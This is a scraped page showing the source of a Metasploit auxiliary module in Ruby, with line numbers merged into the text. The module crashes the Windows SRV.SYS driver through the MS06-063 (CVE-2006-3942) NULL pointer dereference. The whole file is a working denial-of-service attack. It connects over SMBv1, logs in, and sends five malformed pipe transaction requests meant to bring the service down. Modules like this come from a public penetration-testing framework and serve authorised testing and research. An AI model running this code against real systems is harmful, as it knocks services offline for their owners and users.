Path: blob/master/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb
21549 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::SMB::Client7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Microsoft SRV.SYS Pipe Transaction No Null',14'Description' => %q{15This module exploits a NULL pointer dereference flaw in the16SRV.SYS driver of the Windows operating system. This bug was17independently discovered by CORE Security and ISS.18},1920'Author' => [ 'hdm' ],21'License' => MSF_LICENSE,22'References' => [23['OSVDB', '27644' ],24['MSB', 'MS06-063' ],25['CVE', '2006-3942'],26['BID', '19215'],27],28'Notes' => {29'Stability' => [CRASH_SERVICE_DOWN],30'SideEffects' => [],31'Reliability' => []32}33)34)3536deregister_options('SMB::ProtocolVersion')37end3839def run40print_status('Connecting to the target system...')4142connect(versions: [1])43smb_login4445begin461.upto(5) do |i|47print_status("Sending bad SMB transaction request #{i}...")48simple.client.trans_nonull(49"\\#{Rex::Text.rand_text_alphanumeric(1..16)}",50'',51Rex::Text.rand_text_alphanumeric(1..16),523,53[1, 0, 1].pack('vvv'),54true55)56end57rescue ::Interrupt58return59rescue StandardError => e60print_error("Error: #{e.class} > #{e}")61end6263disconnect64end65end666768